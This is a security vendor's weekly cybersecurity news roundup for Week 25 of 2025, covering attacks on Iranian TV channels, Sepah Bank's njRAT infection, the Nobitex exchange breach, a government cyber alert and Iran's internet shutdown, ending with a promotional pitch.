As your dedicated cybersecurity services provider, Cyberone equips you with timely and in-depth information about current cyber attacks. Discover a weekly cybersecurity report of the latest exploits and breaches shaping the ever-evolving cybersecurity landscape.
Weekly Cybersecurity Report | Week 25, 2025
Information security updates and events from the past week
1 Hackers hacked Iranian TV channels and broadcast calls for rebellion against the regime
Channels affiliated with the Iranian opposition reported a widespread hack of Iranian TV channels, during which hackers broadcast messages calling on the Iranian public to take to the streets and revolt against the regime. Among the channels hacked was the government-run IRIB network.
The messages broadcast showed women cutting their hair, a symbolic gesture well remembered from the major protests that broke out in Iran about two and a half years ago. The protests broke out following the death of Mehsa Amini, a young Iranian woman of Kurdish origin, after she was beaten by Iranian morality police in Tehran.
The IRIB network, which is owned and directly supervised by the Iranian regime, serves as one of the government’s main propaganda tools. The hack is a significant symbolic blow to the regime and demonstrates the vulnerabilities of government media systems.
2 Iran’s AFTA Center for Strategic Management publishes investigation into attack that hit Sepha Bank’s core systems – njRAT malware infiltrated email server
Iran is now publishing an official investigation into the attack that targeted Sepha Bank, one of the country’s key government banks.
According to the report, this was a large-scale attack that was apparently carried out by a sophisticated state actor, they claim, and included remote control, data theft, and infection of workstations.
– Attack tool: The infiltration was carried out using njRAT malware, a type of Remote Access Trojan, which allowed attackers to control internal systems, steal sensitive files, and monitor the bank’s email traffic. The report includes precise documentation of the PowerShell code that was used to download the RAT to the infected workstations.
– Infiltration vector: The malware was apparently introduced through the MDaemon server, an old internal email platform that the bank also operated on outdated operating systems such as Windows Server 2003. The attackers identified the vulnerabilities and exploited them to inject the malicious code through external IP addresses.
– Attack stages: According to the report, the infiltration began with a phishing campaign or through an unsecured connection, continued by downloading a malicious file from the server and ending with full control of the bank’s internal infrastructure.
Internal reactions in Iran: The report admits that this was a serious attack, and reveals that the bank’s defenses, including antivirus, failed to initially identify the threat. Only after an in-depth analysis was the full infrastructure deployed against the bank discovered.
This is a strategic infiltration into the heart of an Iranian financial system, using remote control tools and sophisticated infrastructure.
3 “With a Dog” – Iran issues a government cyber alert, slows down the Internet and closes the stock exchange, there is no doubt that the impact is felt in Iran
The Tehran regime has issued a series of official statements, both from the Presidential Strategic Management Center and from the government spokeswoman, indicating heavy pressures in cyberspace.
Details of the announcements:
– The AFTA Center for Strategic Management of the Presidency has issued a government cyber alert that will be in effect from June 21 to June 31, 2025
– The alert includes a requirement for all system, IT and information security managers to immediately prepare and strictly implement a protection policy
– Government spokeswoman Fatma Mohajrani added in a separate message: Evacuation messages that arrive by SMS should not be considered, they are part of psychological warfare
– The speed of browsing in Iran is being temporarily slowed as a “proactive move for network stability”
– The Iranian capital market is closed to the public “in order to protect citizens’ capital”
Iran officially admits to heavy pressures on its digital infrastructure. While the regime struggles with attempts to destabilize it from within, the impact of external moves, apparently also in the cyber arena, is beginning to seep into the Iranian public.
4 Iran admits: The scale of the attack on the Nobitex exchange is much more serious than initial estimates
Iran is forced to admit that the attack on the Nobitex crypto exchange, which began with a localized intrusion, turned out to be a large-scale takeover of all the company’s systems.
A statement published a short time ago by Iranian officials stated that:
– The company’s internal systems are completely infected
– The attackers had access to employees’ Gmail accounts and social networks
– The scope of the leak “even exceeds the events that struck the transportation company Snap”
– For comparison, Snap, which provides transportation and food delivery services throughout Iran (like Uber), experienced a cyberattack in late 2023 in which user details, addresses and internal operational information, including real-time driver locations, were leaked. The incident caused the shutdown of critical services and severely damaged public trust.
5 Iran has begun a gradual shutdown of the country’s internet network – initially partially, with estimates that this will lead to an almost complete shutdown soon.
At the same time, Iran is trying to place the blame on Israel, claiming that it was Israel that launched a large-scale cyberattack on the country’s digital infrastructure, with the aim of disrupting services for residents.
However, it is important to emphasize that Iran has a regular policy of shutting down the network during times of security or civil tensions. For example, in November 2019 – following widespread protests – the country was almost completely cut off from the network for several days.
Tools such as VPNs or other bypass solutions are not necessarily effective, as the Iranian regime controls the Internet access gateways and sometimes even blocks HTTPS traffic.
Alongside this, a national intranet (National Information Network – NIN) operates in Iran, which allows residents to access websites and systems under the regime’s supervision even when completely disconnected from the global Internet.
The cybersecurity attacks highlighted in this report aren’t just incidents, they’re blueprints of the adversary’s arsenal. To protect your business you need the right partner. Cyberone is here to help! Check out our services.
